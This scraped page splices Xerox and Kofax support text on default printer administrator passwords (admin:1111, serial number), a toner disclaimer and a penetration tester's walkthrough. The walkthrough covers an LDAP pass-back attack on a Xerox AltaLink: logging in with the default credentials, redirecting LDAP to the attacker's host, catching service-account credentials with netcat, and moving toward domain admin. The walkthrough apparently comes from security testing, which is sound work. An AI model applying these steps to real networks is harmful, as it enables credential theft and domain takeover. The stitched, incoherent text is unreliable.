Fuji Xerox Administrator Password

[Jenifer Griffard]

Wereceive many questions about the username and password on Xerox printers and multifunction devices (MFD). The username and password are required for system administrator access to the printer and the embedded web server (EWS). The username and password can help to safeguard your machine from unwanted settings changes.

The optimum scenario would be for one person to be the system administrator of the printer. That person would have the responsibility to make any setting or set-up changes to the device. We refer to that person as the system administrator (admin). The admin would be the person to change the username and password to protect the printer from unwanted changes. Once the username and/or password are changed from the defaults, which is highly recommended, the username and/or password cannot be reset without a call to support. The reset may require a visit from a technician depending on the model of the device.

The default password will be 1111 on most printers or the serial number of the machine. The password on most devices is case sensitive, so if your serial number contains letters, please use the correct case.

Due to security concerns and complexity, we cannot post or give instructions for resetting the username and /or password back to the defaults in the online support or on the customer support forums. The process is not for users. It potentially puts the user in an area of the machine where mistakes could cause the machine to become unusable if the correct steps are not followed. More importantly it removes a layer of security if everyone knows or learns how to reset the username and/or password.

It is important that if the username and/or password is changed remember it or note the new values somewhere away from the device. Consider having at least two people know this information in case one of them is not available and an issue comes up where the username and password would be required.

About At Your ServiceXerox products big and small have many features, options and services. Let Xerox Customer Support help you understand and use the features, options and services available for your production, office or small business products and laugh a little along the way.

Issue: If the Kofax Unified Client Login application is in use, and the device is configured in the DRS, then the client uses the Administrator PIN set on the Equitrac server-side as password, both at the device and on the device web page. In this case, the default user name ("admin") and the default device administrator password ("equitrac") do not work.

Solution: Verify or update the current device Administrator PIN in Equitrac. Log in to Equitrac with administrator privileges. In System Configuration, go to Global Configuration Settings > Embedded Devices, and select Canon Unified Client in on the left. The Embedded Devices: Canon Unified Client panel appears. Under Settings, verify or revise the Administrator PIN.

Issue: If the Kofax Unified Client Login application is in use, and the device is configured in the DRS, then the client uses the Admin Access Password set in the DRS as password, both at the device and on the device web page. The default user name is ("admin").

Note: Depending on when the device was manufactured or the software version installed, the default administrator password may be the device serial number or 1111. The username and password are case sensitive.

Unless expressly stated, the toner, ink cartridges or all other supplies available for sale that are compatible with Samsung or any other Printer brands are not manufactured by Samsung, HP, Canon, Brother, Lexmark or any other brands or manufacturer.

The attack I'm about to show you is not specific to the Xerox printers. This is a weaknesses impacting a large majority of off-the-shelf IoT devices. This type of attack is an attack where we direct an MFP device into authenticating via LDAP or SMB against a rogue system rather than the expected server. In essence we're leveraging the trust relationships between devices, and critical systems such as AD. These are devices you'll commonly run into during your internal penetration tests, and most times network admins won't bother changing the default credentials. This results in attackers during valid domain credentials which can be leveraged as a stepping stone to obtaining domain admin in a network.

On a recent engagement I found myself inside a clients network with the usual internal software, PBX's, security alarm systems, FTP clients and A LOT of printers. Unfortunately, most were patched and the default passwords changed. All except for the Xerox Printers. The printers on the network were the xerox altalink b8055 and the default password for these are admin:1111

As seen in the image below we were able to successfully authenticate. As a note even if the username and passwords have been changed, its feasible to brute-forced this login as the user will remain admin and the password would typically be easily guessable.

Here is where the LDAP server and utilities is configured and located. We can see that there are 2 LDAP server IP's set 10.101.x.x and 10.115.x.x and if we look at the Login Name we see that a domain joined service account domain\printersvc being used (this is the default service account) for this service.

What we'll do is change the IP address of the LDAP server to the IP address of our machine. Therefore, LDAP queries will be passed through us instead of to the server. For those who dont know LDAP is queried in plain text. What we're trying to do here is have the domain\printersvc user authenticate to us via LDAP so that we can recover its credentials in clear text.

As seen above we've changed the IP address of the Xerox's LDAP server to our machine. Once this has been performed we will go to the User Mappings seen below, and and validate that the LDAP server is the IP of our machine. At this point we will leverage the netcat utility to receives the connection which will displays the credentials used by the printer to reach the active directory domain controller, including domain, username and password. Once our netcat listener is setup we will use the LDAP server search field, and search for anything.

TADA now you've got a domain user and his credentials. From here your job is relatively easy. In the best-case scenario, you've just obtained a AD user account that belongs to privileged security groups.

A sad truth from experience is that these printer service account will typically belong to a privileged group such as "Domain Admins" or "Enterprise Admins" which grants the attacker full control over the Active Directory Domain. Making this typically Medium CVSS finding (default credentials) a critical vulnerability.

If you're unlucky and you're not DA you can still use the domain user to gain a foothold in the domain. For example, given that this is probably not a Red Team, you might as well leverage bloodhound with this service account to obtain a list of all domain users.

As a gentle reminder, this type of vulnerability can be found on most systems that you'll typically encounter on a clients network. So always test for default credentials no matter how silly or unimpactful you think that system may be.

At your computer, open a web browser (such as Firefox, Chrome or Internet Explorer), and type the IP address of the printer in the address field, then press Enter.

Note: If your printer is locked, type the system administrator user name and password to access the Properties tab. The administrator user name is admin and the default password is 1111.

3a8082e126